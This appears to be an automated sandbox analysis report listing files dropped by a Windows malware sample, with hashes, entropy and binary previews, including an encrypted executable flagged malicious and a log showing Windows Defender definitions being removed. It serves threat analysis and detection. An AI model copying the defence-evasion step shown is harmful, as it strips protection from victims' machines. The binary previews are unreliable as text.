                                                                                                                                                                                                                                Preview:>...m0_$@......8C..`.a..=..`.a..=..@T.!.?sp....c;......`C.......<.......?...............?.......TZ...FJ..FJ..FJ..GJ.j.a.-.J.P...z.h.-.C.N...k.o.-.K.R...z.h.-.T.W...u.k.............@NJ.....HNJ.....PNJ.....XNJ.....hNJ.....pNJ.....xNJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......OJ......OJ......OJ......OJ..... OJ.....(OJ.....0OJ. ...8OJ.!...@OJ."....GJ.#...HOJ.$...POJ.%...XOJ.&...`OJ.'...hOJ.)...pOJ.*...xOJ.+....OJ.,....OJ.-....OJ./....OJ.6....OJ.7....OJ.8....OJ.9....OJ.>....OJ.?....OJ.@....OJ.A....OJ.C....OJ.D....OJ.F....OJ.G....OJ.I....PJ.J....PJ.K....PJ.N....PJ.O... PJ.P...(PJ.V...0PJ.W...8PJ.Z...@PJ.e...HPJ.....PPJ.....TPJ.....`PJ.....lPJ......GJ.....xPJ......PJ......PJ......PJ.....P+J......PJ......PJ......PJ......PJ......PJ......PJ......FJ......FJ......PJ......PJ......QJ......QJ..... QJ.....,QJ.....8QJ.....DQJ.....PQJ.....\QJ.....hQJ.....tQJ. ....QJ.!....QJ."....QJ.#....QJ.$....QJ.%....QJ.&....QJ

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Phenomenon

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
                                                                                                                                                                                                                                File Type:DOS executable (COM, 0x8C-variant)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):59392
                                                                                                                                                                                                                                Entropy (8bit):6.576069677992433
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:fRQLTh/5fhjLueoMmOrrHL/uDoiouK+r5bLmbZzW9FfTubbm:mLthfhnueoMmOqDoioO5bLezW9FfTue
                                                                                                                                                                                                                                MD5:963A4F36BB66B11B13A128A5242B90B0
                                                                                                                                                                                                                                SHA1:77A139BF949B509F01E7620C5A1F83678D905F1D
                                                                                                                                                                                                                                SHA-256:912EE8A0A03BC4612DC42662B2A17032D5787209520AE7E3A93A6C02F5799A79
                                                                                                                                                                                                                                SHA-512:BBFE95F594726B638A01D66D754031329475A0C5B8E462F507363DBE100E933ADA408B3C6A61A39FFC8F07034CB4D3E1AC0945B9DD3E0F97DF462275C55160BD
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:..I....E.E...u.@.x.L....E.. ..x..M..E.P......E.P...Q.....]..u.Q.M.SV.w......t.....d....d.....d...M..d.._^..[....U....SV.u...W.........U..:..........J.....u.j.h.L.j.j.............t..u....u.VR.u............~..uM.6......u.../...E....0.u..u........Q..|....L..t..I8.A..D...|...t..@8.@..3..o.~..uI.6.M.R.u..u..>./..P..E...P.W..M.........I..|....D..t..@8.p..D...|....j.h.L.j.j..'...j.hx.L.j.j..-..._^[....U........E.S3..E.....V.@...M..u.E.].].].].]..]..].W.........E.9..............u.j.h.L.Sj..v...j.X9A.u.......@..E..u.j.hx.L.Sj..O....}..M.Q.......... ...Y..y.j.S.*...3.@f9E.uM.U..E.......t?......PQ.7.M.........x&.......t.f9.....u..E.........u..E......}.3.j.GZ....j.Z.......3..........P.B...Y..t'.8.P..U..U...t.............u.U.3.....]..E....t/............E...@..4....G...;.r.u.3.E.U........t}..M...tt.u..z....j....E.Zf9......uKW..p.I..M...@..........f..f;.u.h..I...h.I..M..E.E.G..F.j.Z....x...E.t....A....M.;.r..u..E...}..E.}.t..E..E......E.E.P..l.I.j .E.SP.V

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Prerequisite

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):68608
                                                                                                                                                                                                                                Entropy (8bit):6.540657980376014
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:yVFE5gOHu1CwCMIBZwneAJu7QnswIPumV3BxZxu6/sPYcSyRXzW8/uC6LdTmHwAE:pPtCZEMnVIPPBxT/sZydTmo
                                                                                                                                                                                                                                MD5:C3F2F9D2C58E5C65A456D712A04805EC
                                                                                                                                                                                                                                SHA1:467ADE6888E946ECDCE48AC8A9A46CF3A00FC0EF
                                                                                                                                                                                                                                SHA-256:67B8C664C1144A63C24084164CAD6AA809959989A6E1F9AC5F34988C49CA0E65
                                                                                                                                                                                                                                SHA-512:58307B6047B97F0F31B8699E61EED671ADAC47104E9161DEB32682F8C8DF4FD8FD6872CE76C2389D29B00E13661FFA06019B291975AC0F6B1C1820E1F794C154
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:....I.S.u..u..u.S.7....I.SSS.u.....I.....!.......S.v<...v..q....D$$...F@....]....?...`....O...j.....I..o...3.f.......E.jXj.....E.P.....e............E.E..E.X....E.tL..E.....P.E..tL..E......E......E.`uL.....I...u.2.............P..D...\....u.hhuL..u..u..`..2........$.....t..D$p.D$t..i.....$.....u.j.h.EL..(..$.....u.j.h.FL.....$.......5...j.h.FL..L$h..... .....$....EA06.......L$`.8...E...$....j...$......$.....0..$.....]$...........D$8P.D$.PQ..$.....}.....$.......$...........D$.j.^j....D$P...f.D$4.\$D.\$H.\$L.........Yj..L$,.|$\....I.._.._.._..|$<f.D$6..y...D$L..D$(.D$(P..x...|$.3.@.\$T.D$P9D$L.......D$..L$(..F.t$....P.D$(.y..f.|$0.w..D$........D$(......L$(.}.....t..L$........D$(.A..D$,......L$(.A.....t..D$........\$(......L$(.0............D$.P.t$..\.....D$$.t$ V..1u-..$.....o...O...$.......R...$........y..j..,..0u:..$.....ho....$......:....$.......y..S.L$,.x...t$(.t$ .-..7u....,[..........V.{....t$.Y......L$,.....V.b....t$.Y.L$X.D$(P.tw...|$$........L$X.Q....v1.A.j..D..Zf

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Projected

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                Entropy (8bit):6.640311027373874
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:Igoyg/TcK9u8S14RBqp6iuuhi4jofD4hDvW9Sd2m2y6mC8qVVlWYrkJTyxtKYO9i:qygbcoSF7YmDvWQd2m2y6mC8qrkJTy/x
                                                                                                                                                                                                                                MD5:768556FEE102950970CB3685A712E6C3
                                                                                                                                                                                                                                SHA1:4325AB836343D850DF7F987C54C112291E5FC181
                                                                                                                                                                                                                                SHA-256:5AAEED715F0FB58EFF0BF70F387BE141B3D14D5A909B49E9DB7E2B095EDD320C
                                                                                                                                                                                                                                SHA-512:EE46A664080F1BCFD585417EF8A33197F159053AE856677E88DFAE6CC89597DC6B31AA2F01FD6CFD7F1FE2307DB5916DC95139920905C7A85307494989653480
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:3........E......3.........F.;B.tO.....B.+.u...~...B.+.u...~...B.+.t.3.......M........N...B.+.t.3........E......3.........F.;B.tO.....B.+.u...~...B.+.u...~...B.+.t.3.......M........N...B.+.t.3........E......3..........~...B.+.u...B...~.+...]...3.......M.........M......1+.u...q...B.+.u...q...B.+.t.3.......M........I...B.+.t.3........E.......V.M..u.......+.u...Q...F.+.t.3.....I...F..M..u.......+.u...I...F..E.....E.....3.^[]...B...B.."B.K%B...B.c.B.."B..$B.\.B...B..!B..$B...B...B.k!B.'$B...B.?.B..!B..#B.8.B...B.. B.e#B...B.}.B.H B..#B.v.B. .B...B.."B.........L$...D$...|$.....<...i....... ....................%8.M..s..D$......%..L........f.n.f.p.............+......vL..$......$.....f...f..G.f..G f..G0f..G@f..GPf..G`f..Gp.................u.....%..L..s>f.n.f.p.... r........G... .. .. s.......tb.|.........G..D$..........t...G.........u.......t...............t ..$.............G.............u.D$....S..QQ......U.k..l$....(VW.{.3.....M.f;.u..C..A....=4.M..........%....j.^=...

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Purchasing

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):54272
                                                                                                                                                                                                                                Entropy (8bit):6.619327587242789
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:2Xv+G/UXT6TvY464qvI932eOypvcLSDOSp5:2XvpgF4qv+32eOyKODOSp5
                                                                                                                                                                                                                                MD5:8A18D0C184A6F1ACF741CC330C405EEC
                                                                                                                                                                                                                                SHA1:75686776366FC6AABEFF430322AE4CDC0E413EC6
                                                                                                                                                                                                                                SHA-256:FB79A23FF6F19BE3905E3BD5D455A62D3ADF3AA77DD65B2C6067F6F3EB8FD07A
                                                                                                                                                                                                                                SHA-512:B4162D4C910D8393CB77C3183744D35C48BFD10B61048F268FFB81FC343B45C5717DD3B12844602A11A3CBFB29A5503192E407A757687C1EC2BB9269A5B63C71
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:........v...F2..P......F....t....w..$.!uB....Y....E.N(..^$.^0.^ .^,.^<.8........'..........^(.!...,........1........0.......g....F....f.F2f....g....F....P.....P......E....F.[^...tB..tB..tB..tB..tB..tB..tB..tB...A1.. t-...t"...t.H...t....u..I ....I ....I ....I ...I ......A2.. t-...t"...t.H...t....u..I ....I ....I ....I ...I .....X.....u.............2.....c.....u..a..........i...2....._.....u..B..........J...2.....Vj....T.....u.^.F.P..F1..H...P.b.....^.Q..A<.R..Q2..H...R.......Q..A<.R..Q2..H...R........V..W......F..N1.F<.......f.<Pt8.F.PQ..H.........N....F1.A..~1..F.u..............2....._^....y1*t..A(P.C....A...A..@..A(..y..I(....f.y2*t..A(P.v....A...A..@..A(..y..I(....A1<Fu...........Q....A......@...<Nu&..j.Z#.....1....Q...~............2..y,.u......j..............ItO..Lt>..Tt-..h.......A..8hu.@.A,.....A.......A,..........A,.........A,.........Q...<3u..z.2u..B..A,.....A.....<6u..z.4u..B..A,.....A..u<dt.<it.<ot.<ut.<xt.<Xu].A,.....T.A,.....K..lt*..tt...wt...z

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Respectively

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                Entropy (8bit):6.515573994658731
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:kfcqFYRzeyTrSgWuXQAgGMKYCk9zJSFajBVYCmBZ3A/4tjstG188K:lqFqaynB6GMKY99z+ajU1Rjv18n
                                                                                                                                                                                                                                MD5:7190EC4F81336EEE07BE8652BE327351
                                                                                                                                                                                                                                SHA1:C28388CFAE63260C52574176185251A434853D1D
                                                                                                                                                                                                                                SHA-256:494632EB8042259018F22BB23D2BAB18DE989FD505A92129D766219515CF3126
                                                                                                                                                                                                                                SHA-512:EB7FA8654E016246DF70F9470FCE359E8E5D2FC7DBE06F234EE5188859D76BBD6D379B4CC98CA6E68872CE621A2D86C1B0B39448F978D85E7EF1A5878ABC94B2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:.W..)....Y..._....^..[]...U.......SV..Wh.zL..v4......YY..u..F......z3.C.]..E.Ph..........P.u.....I...tP.}..t"WS.u.......P.4....E.....F..V....u..F..F.u..F.!......f..........t,P....I..#.F. .....0.I..F.........t.P....I.2..t.W....Y_^..[....U..QQSVW3.3.@..S.E..E..E.SP.u.....I..E...u.......E.9].tS..u.....P..'.....E.Y.M.QPW.u.....I...tY9].t..u..NDW......E..F..^...t..E..SW.U'..YY.F..F.u7.F.!.....0.I..F.........t.P....I.2..(SW..'..YY.F. .....^.........t.Q....I..._^[....U..E.W.xp.W.......O......................t&@P.......j+.u.....I..G.@P.7j,.u.....I._]...S..VW...C........j.Y...t....t.3...f....3.@f...C.+.tD...t"...uW.C..p........O.;N.t..v.......C..p.......O.;N.t..v.......C..p.......O$;N.t..v....._^[.U...LVj<3..E.VP.bK..3..E.|...@....E.E.E..E.E.E.E.PV.u..Yq..YP.u.....I...u.2.....S.]...W.u.V.u.....u.K.V.u.....u.K V.u.....u.K0V.u..t....u.K@V.u..e....u.sPj..u...S...V.E.P.K@..7...K`;.t.P......M.....f.E.f.Cx.E..Ct...t....t..Cp.......Cp.......Cp...._..[^....U..V....

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Seems

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):44032
                                                                                                                                                                                                                                Entropy (8bit):6.574189507059031
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:lbHazf0Tye4Ur2+9BGmd9OTGQ1Dv7sMvLHfR/X:luZo2+9BGmdATGODv7xvTpv
                                                                                                                                                                                                                                MD5:1D33A1298B5467BDCCF0CD7DD5EA1236
                                                                                                                                                                                                                                SHA1:715233F3A23BA355020AA01C029C47691C6C2CC0
                                                                                                                                                                                                                                SHA-256:A4876320F65E332CEAC09E0C83638B209FFA1CD3806057BBD368C8F5079C9875
                                                                                                                                                                                                                                SHA-512:605B5D78FF761F8942433C98ED0678D9392B359E4CD99E9DF2F62CBD401294371B44B3C34B3CF747A0BB4DA1EB9B5E8DE015C89DA9FD9566D87243040424C4E7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:c#.f.Wy..|...Z.>.m..{(5........z....Y...>...do... Q..<....s.mr..i..]1...v} I. ..q|o.3.U.......r......1.20Y.o......'.d....Gwu..1..i...V7.o.!N......0.a.7..{.......3.p..."2V.....h<. ......uD\...X6.<3.{h..x.@/{................P........l.d......[.DZ..U....|.h?.w.\7..]..K.V....wvpd8.G.FG.o...>z.1aH....OTD.L.....8PWy..=.j.@.m7p.@.....O./..I6.a.wO*...{....Q1..r.A..L.=..D ...."R2666*.:...,.ii.W.'....D..?..xv..{..HFZx.........~..........p.....NlllT.....r@....(.N.[xl....1W.c.X...9..Z.t:.%...{....> DZ....t=..7.:.N|.,....P.....@..&3.6.".w=......H...k.26W.....a..pO.G.v.........:...a.....t..m.+...G..L..-.L..G{H.)...g....c...6U'/.k.....mx....~....#{.\...fb....fj6_%..VTu.......W.E.3Q...v.7|m...{u*..R_......'..K...m-~..aG&.....:.nUUg-..;.P.U...u....!.._-~.GG2.u.]..^.[...96J.+...M..v..G.K...].0...'.Bv..T....|......"r......6R.9?...I...E..g........2D`.'.c......:.]........D....#Y.Y.....^~k..U..Z.\W....a.+S..OF....J.tv....M...h.'...h.,.!.|....:..gbN

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Std

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                Entropy (8bit):6.380156182990265
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:aNXXWle1fR+TIGRViFOaacQ8u66gJjbDrORg/4Sl1d5mgnlILA:aNn9+8si7acQi6w6Rg//l1dDiLA
                                                                                                                                                                                                                                MD5:620009F4A149CC8F565258BDBC9AC70C
                                                                                                                                                                                                                                SHA1:E1BF184CCB41B2B5CD192329653AAD5FB606AC16
                                                                                                                                                                                                                                SHA-256:0980C717933EBC993368D15B3BA4BC5A71DAF3FB778E84138193AD0F3A2715A1
                                                                                                                                                                                                                                SHA-512:09960E0AEFB2E9057426DFD5725E440F729316D586AB8DC6291AED762094905F2A929164A2EBD933BF7A3EE2AF4DFD00AB927ABBFEB3F108B10E81171D483EE3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:..&....E.P.u..)....}.........Q.E.f.E...PWV.E.....f.E....E......%...........Q.E.f.E...PWS.E...................E(.@..jL..@,%.....}...E.t,.u.../..3.@j.Z.........Q.h....u..E.P../......}..t..E.P.u...d.I...tb.E..u.j..u..E.P..h.I...tI.u,.E .u(......u$.u.P.u.3.PP.u.P.u...D.I...t..}..t..E.P.E.P.u,.....E.....}..t..u..u...l.I...t.Wj...t.I.P..x.I...t.V....I...t.S....I..E..t.P....I..u...`.I..u......}..Yt..u...`.I..]..M......_^..[..(.U..QS3..E....W.E...t.G...E..t.j._.E..t9V.E..].Pj...\.I.P..8.I.j..u..E.P..h.I..u.....`.I...^t/.E..u,.u(.u$P.E .....P.u.SW.u..u..u...H.I......}..t..u...`.I._..[..(.U.....e.....e...M.SVWQQ.M..E.Q.H.2..z....u......tl.E.3..}.9x.v_...M.Q2..4.j...<.I...tH.e...>.v?.}.F..E.j..M.QP..........u....E.G....E.;>r.}...t..E.G.}.;x.r...t.Vj...t.I.P..x.I._^..[..V.q.Vj.j(..X.I.P..4.I...u.Vj(..\.I.P..8.I...u.!..>.^.....U....S3.f.E....E..].PSSSSSSh ...j j..E.P..X.I..E...t!.E.P.u.S..\.I..u.....!E...`.I..E....[.....U....SV..Wk^.....S.].. .....S.}......YY.N..F...3.9N.v+._....C.......S.

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Therapist

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):24576
                                                                                                                                                                                                                                Entropy (8bit):6.683007775025292
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:68h6v/WL5jEBUnHgPzTxkCqyzrWBheM7Cc+SaGQPaVNgJ/qedTBKujFxv5w:B5QUnHgPzFkzyPWBh2zGNVWNqexB9jFw
                                                                                                                                                                                                                                MD5:9D56F29524BD8EF16B2E3F8D57490206
                                                                                                                                                                                                                                SHA1:37A5A5FCCB22403B6AA4430417EC3D99A4A4110A
                                                                                                                                                                                                                                SHA-256:FC2399D47EDB8C66469BB25060DA2C1F25DE01E21AF40CE9A29558D3A3A3DAE3
                                                                                                                                                                                                                                SHA-512:A1488388505DA6AEE2D7FE3BC7A8239BEACA4D6472EE40CFFA02A657D5489B2621FCB65304FCA94FB04C94AE9A069AE28994FE00191FAD986D58F45AE77EF6A5
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:...f.."......3._^[..f..6t&f..8..O...f;E........E.....f;E.v..........+...U........^...M...M...E.SV...E.....3.].U..u.W...}..}.........M....... ......(.....K..,.....K..0.....K..4.....K..............U.j([%....f9..].E....................E................ ...............#.;.........j.Y%..p........M.3..8.....t......<.....H.....8.....8.....P......x.....l.....h.....X.....\.....T....U..U...|....U..d........`.........@...f9.t..@.Af9.u...O.U...D......w.U..E.E.8....E....f..8....E.P..(....U.PR.E..p...P.E.L...P.E..].P.E.PRRRR.E.P.E.P.U..7....u..4.........}.............\......X....E..4E8...V.......Y.........s.3...ERCP.E..C..E..C..E.C..E.C.3..C.j.Xf.C"f..\...f.C$f..X...f.C&3..C(.C,.s0.s4..h.....l....u..u...h.....p.....C"..C..T.....C&..K$....8.....H.....X....u..u..u..u..u..<J.}..<.....L............E.U.E....Vf....(...PV.K..E.P.E.}.P.E.P.E.PVVVV.E.P.E.P.....f..h.....4f.C.f..t...f.C f..p...f.C..E.....C..}.........E.E.E.E.u.3..u..E.f9........E.3.f......E.+...;E.....

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Video

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):143
                                                                                                                                                                                                                                Entropy (8bit):4.058927563492483
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:x5WAXKAGMDg1AeUqt/vllpfrYZcFTS9gXeF+N:x4wDuAVqjvVg3F+N
                                                                                                                                                                                                                                MD5:835D7D5EA4EFD26937EA1894231418CA
                                                                                                                                                                                                                                SHA1:B131D21F7FC04E9B0F9D1E047307BEE3581EBF1F
                                                                                                                                                                                                                                SHA-256:47983BE9149D6792688AA72763F2E941A768AF9875ACA3E1CA18F0AAE75921B2
                                                                                                                                                                                                                                SHA-512:AC93D8D78E5D3F55DC68029F4382693955429EB765FB442C1AD9B12E56EA7104CF452192D1C30D90D66454F2FC83769B0B82D0083DE86B926B24A1487A447690
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:perulesserpalacecorrespondence..MZ......................@...............................................!..L.!This program cannot be run in DOS

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Yearly

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):62464
                                                                                                                                                                                                                                Entropy (8bit):6.693843516682922
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:jC03Eq30BcrTrhCX4aVmoJiKwtk2ukC5HRu+OoQjz7nts/M26Nu:70nEoXnmowS2u5hVOoQ7t8T6Y
                                                                                                                                                                                                                                MD5:156DEF4BF859FE09993C29354626891C
                                                                                                                                                                                                                                SHA1:C0834C05A615665A7E6CFE8DF75937E15F3C62DA
                                                                                                                                                                                                                                SHA-256:A771FD25611B7FE3A6EEA8ECD5201B6ECF202943FF55C937D1431560DDC36FFB
                                                                                                                                                                                                                                SHA-512:470AA4DE9EBF1372120EA1FF8A57DAE250816DA724EAC63357E32C3122430D5C992448817028D385C5AB01A4CE6D10EB093801E96564FE97662E3D813A7AE889
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:...f;u......@..u.h.kL..H...Y;.uV...kL....t..U.+...8..4..}.f;..}.u#......u...u!.....................f;u......@..u..kL..M.._.....t..u......@.;)..Y.......4.....kL..M..3.....t..u............)..Y.............kL..M........t..u............(..Y.............kL..M.......t..u...........(..Y............lL..M......t..u........(..Y.......~..lL..M..}.....t&..............E.;.E........E.P.....Gh..I......Y;...)......I....t..M.+.M........f;.u..M.......u..........E..h........@..u.........u#...............j.X;.t.V.Y...........tD........(.....,....p...t+..x'V.......&.....P.f(..NY..t...,.....y.3.5|.I.Wh.?F..u...$.....9.....u:.......t1........$..................;.t.P....Wh.?F..u..........t.P..........M..U~...M..M~.._^..[....U..E.V..Vh.?F..u..........$......... ...........|.I.........t.P...z.......2.^]...U..M.].....U......<...SV..W3.................h.....D$<P.u.....I..D$8P.....Y..L$...t!.Y...x...D\8P..'..KY..t.G..y.L$...(...;.........,...;.......+...;.......Q.D$<P........'

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):64
                                                                                                                                                                                                                                Entropy (8bit):1.1940658735648508
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:NlllulJnp/p:NllU
                                                                                                                                                                                                                                MD5:BC6DB77EB243BF62DC31267706650173
                                                                                                                                                                                                                                SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                                                                                                                                                                SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                                                                                                                                                                SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:@...e.................................X..............@..........

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\DE5A.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):8850847
                                                                                                                                                                                                                                Entropy (8bit):7.994454273476157
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:196608:rrF9uyJovsrurErvI9pWjgaAnajMsbSEo23fQC//OoLxhy:SyJMsrurEUWjJjIfoo4jLxhy
                                                                                                                                                                                                                                MD5:CB769D049C4541F926F5D6B8D1FF5929
                                                                                                                                                                                                                                SHA1:99228F518FEA11218EE5128345A31837F1A188B7
                                                                                                                                                                                                                                SHA-256:E776DCED871CBC19B55D8BEF02608BC0E453E946CAF02F75047878B2BB92F531
                                                                                                                                                                                                                                SHA-512:00C59A3ED07AFBDBF4AEE4865FA83A2AB9CCF4A18DBB11C6EB1A43AE0526210EAE7D1B7A0677F27DA105413F6F4536A26C60E61FB0F1E39C3D333B38C38883F9
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................-..............,..........................................Rich............................PE..d...6.8f.........."....&............@..........@.........................................`.....................................................x....p...;...0...#..W..H$......X...`............................... ...@...............8............................text............................... ..`.rdata..6/.......0..................@..@.data....3..........................@....pdata...#...0...$..................@..@_RDATA.......`......................@..@.rsrc....;...p...<..................@..@.reloc..X............T..............@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\MpCmdRun.log

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                Size (bytes):894
                                                                                                                                                                                                                                Entropy (8bit):3.110091214968621
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:Q58KRBubdpkoPAGdjrlsHNzk9+MlWlLehW51ICEsHNe:QOaqdmOFdjrlUNI+kWResLINUNe
                                                                                                                                                                                                                                MD5:3BC435D4822D7028D587098AC2657412
                                                                                                                                                                                                                                SHA1:CA48310D265C10B64CE418AC65C321CCC8E2233A
                                                                                                                                                                                                                                SHA-256:E3D1700B3420A4944B37DD78D287F503C5FE42CADBBA9220B6B3E16246A46B1A
                                                                                                                                                                                                                                SHA-512:84D60E2ADC6F002A25F432332F906A360DDBD00D222C4303FD92D6154821780C147C572B8CD69FE56BE393F863CC3D498F1F6E17C8562F77F7213ECEDEF17D4F
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. M.a.y. .. 0.8. .. 2.0.2.4. .1.6.:.4.1.:.4.1.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. W.e.d. .. M.a.y. .. 0.8. .. 2.0.2.4. .1.6.:.4.1.:.4.1.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

